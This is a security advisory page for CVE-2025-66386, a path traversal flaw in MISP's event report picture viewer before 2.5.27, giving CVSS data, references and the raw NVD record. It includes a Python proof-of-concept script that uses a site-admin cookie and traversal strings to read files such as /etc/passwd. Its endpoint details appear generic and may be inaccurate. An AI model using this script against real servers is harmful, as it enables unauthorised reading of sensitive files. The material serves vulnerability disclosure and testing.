Security Vulnerability Report
CVE-2025-66386 CVSS 4.1 MEDIUM

CVE-2025-66386

Published: 2025-11-28 07:16:00
Last Modified: 2026-04-15 00:35:42

Description

app/Model/EventReport.php in MISP before 2.5.27 allows path traversal in view picture for a site-admin.

CVSS Details

CVSS Score
4.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

MISP < 2.5.27

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import urllib.parse

# CVE-2025-66386 Path Traversal PoC for MISP < 2.5.27
# Target: MISP instance with site-admin access


def exploit_path_traversal(target_url, session_cookie, target_file):
    """
    Exploit path traversal in MISP EventReport view picture function

    Args:
        target_url: Base URL of MISP instance
        session_cookie: Valid site-admin session cookie
        target_file: File to read (e.g., /etc/passwd)

    Returns:
        File contents if successful, None otherwise
    """
    # Construct path traversal payload
    # Using URL encoding to bypass basic filters
    traversal = "../../../../.." + target_file
    encoded_path = urllib.parse.quote(traversal, safe='')

    # Target endpoint for EventReport view picture
    endpoint = f"{target_url}/eventReports/viewPicture"

    headers = {
        'Cookie': f'MISPISPSESSID={session_cookie}',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    # Payload with path traversal
    params = {
        'event_id': '1',
        'id': '1',
        'path': encoded_path
    }

    try:
        response = requests.get(endpoint, params=params, headers=headers, timeout=10)
        if response.status_code == 200 and len(response.content) > 0:
            return response.content
        else:
            return None
    except requests.exceptions.RequestException as e:
        print(f"Request failed: {e}")
        return None


# Example usage
if __name__ == "__main__":
    target = "https://vulnerable-misp-server.com"
    cookie = "your_site_admin_session_cookie"
    file_to_read = "/etc/passwd"

    result = exploit_path_traversal(target, cookie, file_to_read)
    if result:
        print(f"File contents:\n{result.decode('utf-8', errors='ignore')}")
    else:
        print("Exploitation failed or file not accessible")
```

References

- Fix commit: https://github.com/MISP/MISP/commit/7f4a0386d38672eddc139f5735d71c3b749623ce
- Release diff: https://github.com/MISP/MISP/compare/v2.5.26...v2.5.27

Weakness: CWE-23 (Relative Path Traversal)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-66386",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-28T07:15:59.900",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "app/Model/EventReport.php in MISP before 2.5.27 allows path traversal in view picture for a site-admin."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N",
            "baseScore": 4.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-23"}]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MISP/MISP/commit/7f4a0386d38672eddc139f5735d71c3b749623ce",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/MISP/MISP/compare/v2.5.26...v2.5.27",
        "source": "[email protected]"
      }
    ]
  }
}
```